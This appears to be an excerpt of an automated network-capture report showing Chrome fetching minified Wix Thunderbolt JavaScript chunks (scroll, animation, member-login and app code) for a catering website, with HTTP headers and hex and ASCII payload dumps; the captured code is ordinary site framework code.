                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 3d 74 68 69 73 2e 63 6f 6e 66 69 67 2e 6d 65 61 73 75 72 65 7c 7c 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 63 6f 6e 66 69 67 2e 72 6f 6f 74 3b 74 68 69 73 2e 70 72 6f 67 72 65 73 73 2e 70 3d 74 68 69 73 2e 63 6f 6e 66 69 67 2e 68 6f 72 69 7a 6f 6e 74 61 6c 3f 74 2e 73 63 72 6f 6c 6c 58 7c 7c 74 2e 73 63 72 6f 6c 6c 4c 65 66 74 7c 7c 30 3a 74 2e 73 63 72 6f 6c 6c 59 7c 7c 74 2e 73 63 72 6f 6c 6c 54 6f 70 7c 7c 30 7d 29 2c 74 68 69 73 2e 5f 74 72 69 67 67 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 65 74 20 65 3d 21 31 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 65 7c 7c 28 65 3d 21 30 2c 77 69 6e 64 6f 77 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 28 28 29 3d 3e 7b 65 3d 21 31 2c 74 28 29 7d 29 29
                                                                                                                                                                                                                        Data Ascii: =this.config.measure||(()=>{const t=this.config.root;this.progress.p=this.config.horizontal?t.scrollX||t.scrollLeft||0:t.scrollY||t.scrollTop||0}),this._trigger=function(t){let e=!1;return function(){e||(e=!0,window.requestAnimationFrame((()=>{e=!1,t()}))
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 72 65 6e 74 50 72 6f 67 72 65 73 73 2e 70 2c 74 68 69 73 2e 70 72 6f 67 72 65 73 73 2e 70 2c 2b 28 31 2d 74 68 69 73 2e 63 6f 6e 66 69 67 2e 74 72 61 6e 73 69 74 69 6f 6e 46 72 69 63 74 69 6f 6e 29 2e 74 6f 46 69 78 65 64 28 33 29 2c 74 68 69 73 2e 63 6f 6e 66 69 67 2e 74 72 61 6e 73 69 74 69 6f 6e 45 70 73 69 6c 6f 6e 29 7d 64 65 73 74 72 6f 79 28 29 7b 74 68 69 73 2e 70 61 75 73 65 28 29 2c 74 68 69 73 2e 72 65 6d 6f 76 65 45 66 66 65 63 74 28 29 7d 73 65 74 75 70 45 76 65 6e 74 28 29 7b 74 68 69 73 2e 72 65 6d 6f 76 65 45 76 65 6e 74 28 29 2c 74 68 69 73 2e 63 6f 6e 66 69 67 2e 72 6f 6f 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 63 72 6f 6c 6c 22 2c 74 68 69 73 2e 5f 74 72 69 67 67 65 72 29 7d 72 65 6d 6f 76 65 45 76 65 6e 74 28 29
                                                                                                                                                                                                                        Data Ascii: rentProgress.p,this.progress.p,+(1-this.config.transitionFriction).toFixed(3),this.config.transitionEpsilon)}destroy(){this.pause(),this.removeEffect()}setupEvent(){this.removeEvent(),this.config.root.addEventListener("scroll",this._trigger)}removeEvent()
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 2c 74 2e 72 65 63 74 2e 68 65 69 67 68 74 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 7d 66 75 6e 63 74 69 6f 6e 20 66 28 74 29 7b 6c 65 74 20 65 2c 69 2c 6f 2c 73 2c 66 2c 68 3d 21 31 2c 61 3d 7b 78 3a 74 2e 72 65 63 74 2e 77 69 64 74 68 2f 32 2c 79 3a 74 2e 72 65 63 74 2e 68 65 69 67 68 74 2f 32 2c 76 78 3a 30 2c 76 79 3a 30 7d 3b 63 6f 6e 73 74 20 64 3d 7b 78 3a 30 2c 79 3a 30 7d 3b 72 65 74 75 72 6e 20 74 2e 73 63 65 6e 65 73 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 65 2e 74 61 72 67 65 74 26 26 65 2e 63 65 6e 74 65 72 65 64 54 6f 54 61 72 67 65 74 26
                                                                                                                                                                                                                        Data Ascii: .document.documentElement.clientWidth,t.rect.height=window.document.documentElement.clientHeight}function f(t){let e,i,o,s,f,h=!1,a={x:t.rect.width/2,y:t.rect.height/2,vx:0,vy:0};const d={x:0,y:0};return t.scenes.forEach((e=>{e.target&&e.centeredToTarget&


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        114192.168.2.55006234.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC405OUTGET /services/wix-thunderbolt/dist/group_5.22f6e4ec.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1163INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 32172
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: _q7XDbPOgHa3PnHYdL7DUs71XQW5JJVV
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 647762077 619178523
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 284893310
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc5jtBSNVBClNnNc015G4PmlZXoVxLpWMsBL92iJ2slGH
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:43:27 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 274184
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:35:10 GMT
                                                                                                                                                                                                                        ETag: "a235f3eb11853b5304271883d16d1ccb"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC227INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 36 36 30 5d 2c 7b 35 33 34 36 36 3a 65 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 72 3d 65 2e 73 70 6c 69 74 28 74 2c 61 29 3b 69 66 28 72 2e 6c 65 6e 67 74 68 3d 3d 3d 61 29 7b 76 61 72 20 6e 3d 30 3b 6e 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 3f 72 2e 6a 6f 69 6e 28 74 29 2e 6c 65 6e 67 74
                                                                                                                                                                                                                        Data Ascii: (self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[3660],{53466:e=>{"use strict";e.exports=function(e,t,a){var r=e.split(t,a);if(r.length===a){var n=0;n="string"==typeof t?r.join(t).lengt
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 68 3a 72 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 72 2c 6e 2c 6f 29 7b 76 61 72 20 73 3d 30 3b 72 65 74 75 72 6e 20 6f 2b 31 3c 61 26 26 28 73 3d 65 2e 73 6c 69 63 65 28 72 29 2e 6d 61 74 63 68 28 74 29 2e 73 68 69 66 74 28 29 2e 6c 65 6e 67 74 68 29 2c 72 2b 6e 2e 6c 65 6e 67 74 68 2b 73 7d 29 2c 30 29 2c 72 5b 61 2d 31 5d 2b 3d 65 2e 73 6c 69 63 65 28 6e 29 7d 72 65 74 75 72 6e 20 72 7d 7d 2c 33 36 36 37 33 3a 28 65 2c 74 2c 61 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 66 61 75 6c 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63
                                                                                                                                                                                                                        Data Ascii: h:r.reduce((function(r,n,o){var s=0;return o+1<a&&(s=e.slice(r).match(t).shift().length),r+n.length+s}),0),r[a-1]+=e.slice(n)}return r}},36673:(e,t,a)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e,t){e.onmessage=func
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 65 6c 4d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3f 74 2b 72 2e 6d 65 73 73 61 67 65 44 65 6c 69 6d 69 74 65 72 2b 65 3a 65 7d 2c 74 2e 70 61 72 73 65 43 68 61 6e 6e 65 6c 4d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 69 6e 64 65 78 4f 66 28 72 2e 6d 65 73 73 61 67 65 44 65 6c 69 6d 69 74 65 72 29 3b 72 65 74 75 72 6e 2d 31 3d 3d 3d 74 3f 7b 69 64 3a 6e 75 6c 6c 2c 70 61 79 6c 6f 61 64 3a 65 7d 3a 7b 69 64 3a 65 2e 73 6c 69 63 65 28 30 2c 74 29 2c 70 61 79 6c 6f 61 64 3a 65 2e 73 6c 69 63 65 28 74 2b 31 29 7d 7d 2c 74 2e 63 6f 6e 73 74 72 75 63 74 43 6f 6e 6e 65 63 74 69 6f 6e 4d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 72 2e 63 6f 6e
                                                                                                                                                                                                                        Data Ascii: elMessage=function(e,t){return t?t+r.messageDelimiter+e:e},t.parseChannelMessage=function(e){var t=e.indexOf(r.messageDelimiter);return-1===t?{id:null,payload:e}:{id:e.slice(0,t),payload:e.slice(t+1)}},t.constructConnectionMessage=function(e){return r.con
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 65 2c 74 2c 61 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 2e 72 28 74 29 2c 61 2e 64 28 74 2c 7b 6e 61 6d 65 3a 28 29 3d 3e 63 2e 55 2c 73 69 74 65 3a 28 29 3d 3e 6c 7d 29 3b 76 61 72 20 72 3d 61 28 37 39 34 33 35 29 2c 6e 3d 61 28 37 37 37 34 38 29 2c 6f 3d 61 28 38 37 37 31 31 29 2c 73 3d 61 28 32 30 35 39 30 29 2c 69 3d 61 28 39 38 33 32 33 29 2c 63 3d 61 28 39 30 31 38 29 3b 63 6f 6e 73 74 20 64 3d 28 30 2c 6e 2e 4f 67 29 28 5b 6f 2e 65 5a 2c 6f 2e 4a 69 2c 69 2e 6a 2c 28 30 2c 6e 2e 4b 54 29 28 73 2e 5f 4b 2c 63 2e 55 29 5d 2c 28 28 65 2c 74 2c 61 2c 6e 29 3d 3e 7b 63 6f 6e 73 74 7b 74 72 61 6e 73 6c 61 74 69 6f 6e 73 3a 6f 7d 3d 6e 3b 72 65 74 75 72 6e 7b 6f 70 65 6e 28 6e 29 7b 61 2e 65 6e 61 62 6c 65 43 79 63 6c 69 63 54 61 62 62 69 6e
                                                                                                                                                                                                                        Data Ascii: e,t,a)=>{"use strict";a.r(t),a.d(t,{name:()=>c.U,site:()=>l});var r=a(79435),n=a(77748),o=a(87711),s=a(20590),i=a(98323),c=a(9018);const d=(0,n.Og)([o.eZ,o.Ji,i.j,(0,n.KT)(s._K,c.U)],((e,t,a,n)=>{const{translations:o}=n;return{open(n){a.enableCyclicTabbin
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 65 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 6f 28 29 2e 66 6f 72 45 61 63 68 28 74 2c 28 65 3d 3e 7b 72 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 64 65 6c 65 74 65 28 65 29 7d 29 29 2c 61 2e 70 75 73 68 55 72 6c 53 74 61 74 65 28 72 29 7d 7d 29 7d 29 29 29 2c 70 3d 65 3d 3e 7b 65 28 72 2e 48 39 29 2e 74 6f 28 6c 29 7d 7d 2c 36 35 34 39 3a 28 65 2c 74 2c 61 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 2e 72 28 74 29 2c 61 2e 64 28 74 2c 7b 41 70 70 44 65 66 49 64 73 3a 28 29 3d 3e 76 2c 52 45 47 49 53 54 52 41 54 49 4f 4e 5f 52 45 53 55 4c 54 5f 53 54 41 54 55 53 5f 44 49 53 50 4c 41 59 3a 28 29 3d 3e 66 2c 52 6f 6c 65 3a 28 29 3d 3e 75 2c 55 73 65 72 45 72 72 6f 72 73 3a 28 29 3d 3e 79 2c 55 73 65 72 52 6f 6c 65 73 3a 28 29 3d 3e 49 2c 56
                                                                                                                                                                                                                        Data Ascii: e.location.href);o().forEach(t,(e=>{r.searchParams.delete(e)})),a.pushUrlState(r)}})}))),p=e=>{e(r.H9).to(l)}},6549:(e,t,a)=>{"use strict";a.r(t),a.d(t,{AppDefIds:()=>v,REGISTRATION_RESULT_STATUS_DISPLAY:()=>f,Role:()=>u,UserErrors:()=>y,UserRoles:()=>I,V
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 69 74 20 6f 28 65 2c 74 2c 61 3f 2e 63 6f 6e 74 61 63 74 49 6e 66 6f 2c 61 2e 70 72 69 76 61 63 79 53 74 61 74 75 73 7c 7c 63 2e 6c 53 2e 50 52 49 56 41 54 45 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 61 3f 2e 72 65 63 61 70 74 63 68 61 54 6f 6b 65 6e 29 3b 72 65 74 75 72 6e 7b 73 74 61 74 75 73 3a 73 2c 61 70 70 72 6f 76 61 6c 54 6f 6b 65 6e 3a 6e 2c 75 73 65 72 3a 72 7d 7d 2c 72 65 67 69 73 74 65 72 54 6f 55 73 65 72 4c 6f 67 69 6e 3a 64 2c 75 6e 52 65 67 69 73 74 65 72 54 6f 55 73 65 72 4c 6f 67 69 6e 3a 70 2c 72 65 67 69 73 74 65 72 54 6f 4d 65 6d 62 65 72 4c 6f 67 6f 75 74 3a 67 2c 75 6e 52 65 67 69 73 74 65 72 54 6f 4d 65 6d 62 65 72 4c 6f 67 6f 75 74 3a 75 2c 73 65 6e 64 53 65 74 50 61 73 73 77 6f 72 64 45 6d 61 69 6c 3a 49 2c 73 65 6e 64 46 6f
                                                                                                                                                                                                                        Data Ascii: it o(e,t,a?.contactInfo,a.privacyStatus||c.lS.PRIVATE,void 0,void 0,a?.recaptchaToken);return{status:s,approvalToken:n,user:r}},registerToUserLogin:d,unRegisterToUserLogin:p,registerToMemberLogout:g,unRegisterToMemberLogout:u,sendSetPasswordEmail:I,sendFo
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 64 20 69 73 20 61 77 61 69 74 69 6e 67 20 61 70 70 72 6f 76 61 6c 22 7d 28 79 7c 7c 28 79 3d 7b 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 77 69 78 43 6f 64 65 3d 22 36 37 35 62 62 63 65 66 2d 31 38 64 38 2d 34 31 66 35 2d 38 30 30 65 2d 31 33 31 65 63 39 65 30 38 37 36 32 22 2c 65 2e 73 68 6f 75 74 4f 75 74 3d 22 31 33 35 63 33 64 39 32 2d 30 66 65 61 2d 31 66 39 64 2d 32 62 61 35 2d 32 61 31 64 66 62 30 34 32 39 37 65 22 7d 28 76 7c 7c 28 76 3d 7b 7d 29 29 3b 63 6f 6e 73 74 20 77 3d 65 3d 3e 7b 65 28 72 2e 48 39 29 2e 74 6f 28 70 29 7d 7d 2c 31 38 33 33 37 3a 28 65 2c 74 2c 61 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 2e 72 28 74 29 2c 61 2e 64 28 74 2c 7b 4d 61 73 74 65 72 50 61 67 65 54 70 61 50 72 6f 70 73 43 61 63 68 65 53 79
                                                                                                                                                                                                                        Data Ascii: d is awaiting approval"}(y||(y={})),function(e){e.wixCode="675bbcef-18d8-41f5-800e-131ec9e08762",e.shoutOut="135c3d92-0fea-1f9d-2ba5-2a1dfb04297e"}(v||(v={}));const w=e=>{e(r.H9).to(p)}},18337:(e,t,a)=>{"use strict";a.r(t),a.d(t,{MasterPageTpaPropsCacheSy
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 6e 73 74 20 6f 3d 28 65 5b 72 2e 77 69 64 67 65 74 49 64 5d 7c 7c 7b 7d 29 2e 61 70 70 44 65 66 69 6e 69 74 69 6f 6e 49 64 7c 7c 6e 2e 61 70 70 44 65 66 69 6e 69 74 69 6f 6e 49 64 7c 7c 22 22 2c 73 3d 74 2e 67 65 74 41 70 70 49 6e 73 74 61 6e 63 65 42 79 41 70 70 44 65 66 49 64 28 6f 29 3b 69 66 28 21 73 29 7b 63 6f 6e 73 74 20 65 3d 6e 65 77 20 45 72 72 6f 72 28 22 44 69 64 20 6e 6f 74 20 67 65 74 20 61 70 70 20 69 6e 73 74 61 6e 63 65 22 29 3b 65 2e 6e 61 6d 65 3d 22 54 70 61 4d 69 73 73 69 6e 67 41 70 70 49 6e 73 74 61 6e 63 65 22 2c 61 2e 63 61 70 74 75 72 65 45 72 72 6f 72 28 65 2c 7b 74 61 67 73 3a 7b 66 65 61 74 75 72 65 3a 22 66 65 61 74 75 72 65 2d 74 70 61 2d 63 6f 6d 6d 6f 6e 73 22 7d 2c 65 78 74 72 61 3a 7b 61 70 70 44 65 66 69 6e 69 74 69 6f
                                                                                                                                                                                                                        Data Ascii: nst o=(e[r.widgetId]||{}).appDefinitionId||n.appDefinitionId||"",s=t.getAppInstanceByAppDefId(o);if(!s){const e=new Error("Did not get app instance");e.name="TpaMissingAppInstance",a.captureError(e,{tags:{feature:"feature-tpa-commons"},extra:{appDefinitio
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 65 73 74 55 72 6c 3a 64 2c 76 69 65 77 4d 6f 64 65 3a 6c 2c 65 78 74 65 72 6e 61 6c 42 61 73 65 55 72 6c 3a 70 7d 3d 65 2c 67 3d 7b 74 61 72 67 65 74 3a 6e 75 6c 6c 2c 22 73 65 63 74 69 6f 6e 2d 75 72 6c 22 3a 6e 75 6c 6c 7d 3b 69 66 28 6e 2e 77 69 64 67 65 74 49 64 29 7b 63 6f 6e 73 74 7b 77 69 64 67 65 74 55 72 6c 3a 65 2c 6d 6f 62 69 6c 65 55 72 6c 3a 61 7d 3d 73 5b 6e 2e 77 69 64 67 65 74 49 64 5d 2c 69 3d 63 26 26 61 7c 7c 65 2c 64 3d 28 74 2e 67 65 74 28 72 29 3f 2e 63 6f 6d 70 6f 6e 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 65 6e 64 73 57 69 74 68 28 22 73 65 63 74 69 6f 6e 22 29 3b 6e 2e 69 73 53 65 63 74 69 6f 6e 26 26 64 26 26 28 22 73 69 74 65 22 3d 3d 3d 6c 3f 28 67 5b 22 73 65 63 74 69 6f 6e 2d 75 72 6c
                                                                                                                                                                                                                        Data Ascii: estUrl:d,viewMode:l,externalBaseUrl:p}=e,g={target:null,"section-url":null};if(n.widgetId){const{widgetUrl:e,mobileUrl:a}=s[n.widgetId],i=c&&a||e,d=(t.get(r)?.componentType||"").toLowerCase().endsWith("section");n.isSection&&d&&("site"===l?(g["section-url
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 28 22 72 65 73 6f 6c 76 65 22 2c 65 29 7d 29 29 2e 63 61 74 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 28 22 72 65 6a 65 63 74 22 2c 65 2e 6d 65 73 73 61 67 65 7c 7c 65 29 7d 29 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 74 6f 70 4c 69 73 74 65 6e 65 72 26 26 74 68 69 73 2e 73 74 6f 70 4c 69 73 74 65 6e 65 72 28 29 7d 2c 65 7d 28 29 3b 63 6f 6e 73 74 20 4c 3d 28 30 2c 69 2e 4f 67 29 28 5b 28 30 2c 69 2e 4b 54 29 28 64 2e 59 47 2c 73 2e 55 55 29 5d 2c 28 28 7b 6d 65 74 61 53 69 74 65 49 64 3a 65 7d 29 3d 3e 7b 63 6f 6e 73 74 20 74 3d 7b 7d 2c 61 3d 28 65 2c 61 2c 72 29
                                                                                                                                                                                                                        Data Ascii: ).then((function(e){return d("resolve",e)})).catch((function(e){return d("reject",e.message||e)}))}))},e.prototype.stop=function(){this.stopListener&&this.stopListener()},e}();const L=(0,i.Og)([(0,i.KT)(d.YG,s.UU)],(({metaSiteId:e})=>{const t={},a=(e,a,r)


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        115192.168.2.55006134.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC625OUTGET /services/wix-thunderbolt/dist/motion.d05a604c.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1112INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 95126
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: _yWyWgpXiGKzERpMCnpyjL2udgHlqJRL
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: true
                                                                                                                                                                                                                        X-Varnish: 120399323 14195517
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: serve
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 06:45:17 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 25674
                                                                                                                                                                                                                        Last-Modified: Fri, 10 Jan 2025 05:59:16 GMT
                                                                                                                                                                                                                        ETag: "09c587f361bed7d0c70e8dce1f76f0e7"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC278INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 39 30 39 5d 2c 7b 36 38 37 34 37 3a 28 74 2c 65 2c 61 29 3d 3e 7b 61 2e 72 28 65 29 2c 61 2e 64 28 65 2c 7b 41 6e 69 6d 61 74 69 6f 6e 4d 61 6e 61 67 65 72 3a 28 29 3d 3e 4d 2c 4d 6f 74 69 6f 6e 53 79 6d 62 6f 6c 3a 28 29 3d 3e 54 2e 68 2c 61 6e 69 6d 61 74 69 6f 6e 41 70 69 46 61 63 74 6f 72 79 3a 28 29 3d 3e 5f 72 2c 70 61 67 65 3a 28 29 3d 3e 44 72 7d 29 3b 76 61 72 20 6e 3d 7b 7d 3b 61 2e 72 28 6e 29 2c 61 2e 64 28 6e 2c 7b 69 6e 69 74 69 61
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[3909],{68747:(t,e,a)=>{a.r(e),a.d(e,{AnimationManager:()=>M,MotionSymbol:()=>T.h,animationApiFactory:()=>_r,page:()=>Dr});var n={};a.r(n),a.d(n,{initia
